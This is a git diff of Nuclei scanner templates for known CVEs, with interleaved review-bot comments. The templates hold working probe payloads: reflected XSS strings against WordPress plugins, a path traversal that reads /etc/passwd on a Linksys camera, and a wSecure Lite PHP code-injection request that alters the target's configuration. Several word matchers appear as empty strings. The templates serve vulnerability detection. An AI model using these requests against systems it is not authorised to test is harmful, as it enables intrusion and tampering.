diff --git a/CVE-2009-1558.yaml b/CVE-2009-1558.yaml
new file mode 100755
index 0000000..f56848b
--- /dev/null
+++ b/CVE-2009-1558.yaml
@@ -0,0 +1,24 @@
+id: CVE-2009-1558
+
+info:
+ name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
+ reference: https://www.exploit-db.com/exploits/32954
+ tags: cve,cve2009,iot,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2011-4618.yaml b/CVE-2011-4618.yaml
index e043051..301cd48 100644
--- a/CVE-2011-4618.yaml
+++ b/CVE-2011-4618.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2011-4624.yaml b/CVE-2011-4624.yaml
index 6b6eae3..2ae32f0 100644
--- a/CVE-2011-4624.yaml
+++ b/CVE-2011-4624.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
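Review bot: The new `words:` entry in the CVE-2011-4618 hunk reads as an empty string, `- ""`, and an empty string is a substring of every body, so as displayed the template would fire on every 200 text/html response; most likely the rendered page stripped a `<script>` tag from both the old and the new line, but it is worth confirming the committed value is the full reflected-payload string. The same applies to every hunk in this commit that replaces a `words:` entry and to the `words:` lists of the newly added XSS templates. A second point: the new path drops the `%22%3E` attribute break-out the old payload carried, and in CVE-2012-2371, CVE-2017-18536, CVE-2017-9288, CVE-2019-15713, CVE-2020-17362, CVE-2021-24320 and CVE-2021-24335 an img/svg event-handler vector is swapped for the same `</script><script>` string; where the earlier vector was chosen because `<script>` was filtered this can turn a detection into a false negative, so the commit message should say whether the new payload was re-validated against a known-vulnerable instance. Either way a body match on the reflected string proves unescaped reflection rather than script execution, which is the right claim for a scanner template but should be kept in mind when triaging results.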
diff --git a/CVE-2011-4926.yaml b/CVE-2011-4926.yaml
index 17178b7..bbefdb8 100644
--- a/CVE-2011-4926.yaml
+++ b/CVE-2011-4926.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2011-5106.yaml b/CVE-2011-5106.yaml
index a17da7f..fb203bd 100644
--- a/CVE-2011-5106.yaml
+++ b/CVE-2011-5106.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2011-5107.yaml b/CVE-2011-5107.yaml
index c01e565..ef7a3e9 100644
--- a/CVE-2011-5107.yaml
+++ b/CVE-2011-5107.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2011-5179.yaml b/CVE-2011-5179.yaml
index 9c92b5c..fc3dcab 100644
--- a/CVE-2011-5179.yaml
+++ b/CVE-2011-5179.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2011-5181.yaml b/CVE-2011-5181.yaml
index 41812c7..c7e74be 100644
--- a/CVE-2011-5181.yaml
+++ b/CVE-2011-5181.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2011-5265.yaml b/CVE-2011-5265.yaml
index 2ed7592..5412865 100644
--- a/CVE-2011-5265.yaml
+++ b/CVE-2011-5265.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2012-0901.yaml b/CVE-2012-0901.yaml
index fb82bdf..728c0cc 100644
--- a/CVE-2012-0901.yaml
+++ b/CVE-2012-0901.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2012-1835.yaml b/CVE-2012-1835.yaml
new file mode 100755
index 0000000..9bc5c08
--- /dev/null
+++ b/CVE-2012-1835.yaml
@@ -0,0 +1,34 @@
+id: CVE-2012-1835
+
+info:
+ name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
+ tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2012-2371.yaml b/CVE-2012-2371.yaml
index 61a2207..b41122f 100644
--- a/CVE-2012-2371.yaml
+++ b/CVE-2012-2371.yaml
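Review bot: The four commented-out `path:` entries sit at column 0 inside the sequence and still carry the old `alert(123)` payload, so they read as dead code rather than documentation; either drop them or replace them with a short comment above the live path, e.g. `# untested: agenda-widget-form.php title[id], agenda-widget.php args[before_widget]/before_title/after_title`. The `name` says version 1.4 while `description` says 1.4 and 1.5; aligning the two (`name: WordPress Plugin All-in-One Event Calendar 1.4/1.5 - Reflected Cross-Site Scripting (XSS)`) avoids a misleading title in scan output.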
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'
+ - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2012-4242.yaml b/CVE-2012-4242.yaml
index 791034e..d7ca7ac 100644
--- a/CVE-2012-4242.yaml
+++ b/CVE-2012-4242.yaml
@@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2012-4273.yaml b/CVE-2012-4273.yaml
index db31bfa..99a6f52 100644
--- a/CVE-2012-4273.yaml
+++ b/CVE-2012-4273.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+ - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2012-4768.yaml b/CVE-2012-4768.yaml
index e89963b..5c19877 100644
--- a/CVE-2012-4768.yaml
+++ b/CVE-2012-4768.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2012-5913.yaml b/CVE-2012-5913.yaml
index be685d2..cdbbce2 100644
--- a/CVE-2012-5913.yaml
+++ b/CVE-2012-5913.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'
+ - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2013-2287.yaml b/CVE-2013-2287.yaml
index 33a0b55..05ae701 100644
--- a/CVE-2013-2287.yaml
+++ b/CVE-2013-2287.yaml
@@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2013-4117.yaml b/CVE-2013-4117.yaml
index f30a61b..2b2a102 100644
--- a/CVE-2013-4117.yaml
+++ b/CVE-2013-4117.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2013-4625.yaml b/CVE-2013-4625.yaml
index 4b9f913..e2184bc 100644
--- a/CVE-2013-4625.yaml
+++ b/CVE-2013-4625.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+ - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2014-4513.yaml b/CVE-2014-4513.yaml
index dfcae28..2661d56 100644
--- a/CVE-2014-4513.yaml
+++ b/CVE-2014-4513.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
+ - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2016-1000128.yaml b/CVE-2016-1000128.yaml
new file mode 100755
index 0000000..b3dea4b
--- /dev/null
+++ b/CVE-2016-1000128.yaml
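Review bot: In the CVE-2014-4513 hunk only the MESSAGE parameter was moved to the new `</script><script>alert(document.domain)</script>` payload; EMAIL and NAME in the same path still carry `%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E`. The matcher only needs the first reflection, but the leftover `document.cookie` strings look like an oversight and will confuse anyone comparing this path with the rest of the commit, so either update them to the same `alert(document.domain)` form or drop them. The MESSAGE value also keeps a `%3C%2Ftextarea%3E` prefix in front of `</script>`; that is fine, but a one-line comment above the path explaining the textarea break-out would help, since no other template in this commit needs one.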
@@ -0,0 +1,29 @@
+id: CVE-2016-1000128
+
+info:
+ name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-1000129.yaml b/CVE-2016-1000129.yaml
new file mode 100755
index 0000000..9b0f144
--- /dev/null
+++ b/CVE-2016-1000129.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000129
+
+info:
+ name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-1000130.yaml b/CVE-2016-1000130.yaml
new file mode 100755
index 0000000..1814107
--- /dev/null
+++ b/CVE-2016-1000130.yaml
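Review bot: CVE-2016-1000128 has no `description:` while the sibling templates added in this commit (CVE-2016-1000129, -130, -132, -133, -134, -135) each carry a one-liner; CVE-2016-1000131 and CVE-2018-16059 have the same gap. A line in the sibling form, `description: Reflected XSS in wordpress plugin anti-plagiarism v3.60`, keeps the info block uniform and gives scan output more than the title to report. The `name` states an upper bound of `<= 3.60` but the only reference is the NVD entry; if the bound comes from a vendor or researcher advisory, a second reference line to it would make the version claim checkable.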
@@ -0,0 +1,30 @@
+id: CVE-2016-1000130
+
+info:
+ name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin e-search v1.0
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-1000131.yaml b/CVE-2016-1000131.yaml
new file mode 100755
index 0000000..a9c8dcb
--- /dev/null
+++ b/CVE-2016-1000131.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-1000131
+
+info:
+ name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-1000132.yaml b/CVE-2016-1000132.yaml
new file mode 100755
index 0000000..fa94048
--- /dev/null
+++ b/CVE-2016-1000132.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000132
+
+info:
+ name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-1000133.yaml b/CVE-2016-1000133.yaml
new file mode 100755
index 0000000..48e7531
--- /dev/null
+++ b/CVE-2016-1000133.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000133
+
+info:
+ name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-1000134.yaml b/CVE-2016-1000134.yaml
new file mode 100755
index 0000000..99d4268
--- /dev/null
+++ b/CVE-2016-1000134.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000134
+
+info:
+ name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-1000135.yaml b/CVE-2016-1000135.yaml
new file mode 100755
index 0000000..48480b2
--- /dev/null
+++ b/CVE-2016-1000135.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000135
+
+info:
+ name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-10956.yaml b/CVE-2016-10956.yaml
index 4c48c18..b59c24d 100644
--- a/CVE-2016-10956.yaml
+++ b/CVE-2016-10956.yaml
@@ -2,7 +2,7 @@ id: CVE-2016-10956
info:
name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
- author: daffainfo
+ author: daffainfo,0x240x23elu
severity: high
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
diff --git a/CVE-2016-10960.yaml b/CVE-2016-10960.yaml
new file mode 100755
index 0000000..68f7e26
--- /dev/null
+++ b/CVE-2016-10960.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-10960
+
+info:
+ name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
+ author: daffainfo
+ severity: critical
+ description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
+ reference: |
+ - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
+ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+ tags: cve,cve2016,wordpress,wp-plugin,rce
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
+ body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Nuclei: CVE-2016-10960"
+ condition: and
+ part: header
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2017-17043.yaml b/CVE-2017-17043.yaml
index 3d321b4..8dab040 100644
--- a/CVE-2017-17043.yaml
+++ b/CVE-2017-17043.yaml
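Review bot: The CVE-2016-10960 request is not read-only: `wsecure_action=update` with the crafted `publish` value appears to write the injected PHP into the plugin's configuration on the target (the `";} header(...); class WSecureConfig2 {var $test="` shape only makes sense if the value is persisted into a PHP file), so a scan would leave a modified `wsecure-config.php` behind. That should be stated in `description` and as a comment above `body:`, e.g. `# NOTE: the update action persists the injected value in the plugin config — this is not a read-only check`, so operators can exclude it from routine scans. `reference: |` turns the three `- https://...` lines into one literal string rather than a list; the other templates in this commit use a plain scalar, so drop the `|` (or make `reference` a real sequence) if the consumer expects a list — CVE-2018-12031, CVE-2018-16059 and CVE-2019-20085 use the same pattern. `condition: and` on a single-entry `words:` list is a no-op and can go.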
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
+ - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2017-17059.yaml b/CVE-2017-17059.yaml
index ecf71fa..9bc3b47 100644
--- a/CVE-2017-17059.yaml
+++ b/CVE-2017-17059.yaml
@@ -13,7 +13,7 @@ info:
requests:
- method: POST
path:
- - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
+ - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"
body: "amty_hidden=1"
@@ -21,7 +21,7 @@ requests:
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2017-17451.yaml b/CVE-2017-17451.yaml
index 40a4e59..9a2c3bc 100644
--- a/CVE-2017-17451.yaml
+++ b/CVE-2017-17451.yaml
@@ -17,7 +17,7 @@ requests:
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2017-18536.yaml b/CVE-2017-18536.yaml
index 5ac65f8..7bed4c1 100644
--- a/CVE-2017-18536.yaml
+++ b/CVE-2017-18536.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
+ - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
